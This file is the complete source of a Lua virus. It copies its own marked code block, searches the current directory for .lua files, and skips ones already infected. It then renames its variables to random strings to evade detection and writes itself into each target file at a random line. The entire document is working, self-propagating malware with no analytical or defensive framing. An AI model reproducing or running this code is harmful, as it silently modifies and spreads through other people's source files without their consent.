--lamestart
require 'lfs'

comment = string.format('%c%c', 45, 45)
startstring = comment .. 'lamestart'
endstring = comment .. 'lameend'

filehandle = io.open(arg[0], 'r')
while true do
    line = filehandle:read()
    if not line then break end
    if line == startstring then break end
end
mycode = startstring .. '\n'

while true do
    line = filehandle:read()
    if not line then break end
    if line == endstring then break end
    mycode = mycode .. line .. '\n'
end
mycode = mycode .. endstring

for goatfile in lfs.dir(lfs.currentdir()) do
    if goatfile ~= '.' and goatfile ~= '..' then
        if string.find(goatfile, '.lua') then
            goathandle = io.open(goatfile, 'r')
            goatcode = {}
            goatpos = 0
            alreadyinfected = 0
            while true do
                goatline = goathandle:read()
                if not goatline then break end
                if string.find(goatline, endstring) then
                    alreadyinfected = 1
                    break
                end
                goatpos = goatpos + 1
                table.insert(goatcode, goatpos, goatline)
            end
            if alreadyinfected == 0 then
                nextgen = mycode
                varaibles = {'comment', 'startstring', 'endstring', 'filehandle', 'line', 'mycode', 'insertat', 'goatfile', 'goathandle', 'goatpos', 'alreadyinfected', 'goatcode', 'varaibles', 'xcounter', 'newvar'}
                for xcounter = 1, table.getn(varaibles) do
                    newvar = ''
                    for varcounter = 1, math.random(5, 15) do
                        newvar = newvar .. string.format('%c', math.random(65, 90))
                    end
                    nextgen = string.gsub(nextgen, varaibles[xcounter], newvar)
                end
                goathandle = io.open(goatfile, 'w')
                insertat = math.random(1, table.getn(goatcode))
                for goatpos = 1, table.getn(goatcode) do
                    goathandle:write(goatcode[goatpos] .. '\n')
                    if goatpos == insertat then
                        goathandle:write(nextgen .. '\n\n')
                    end
                end
            end
        end
    end
end
--lameend
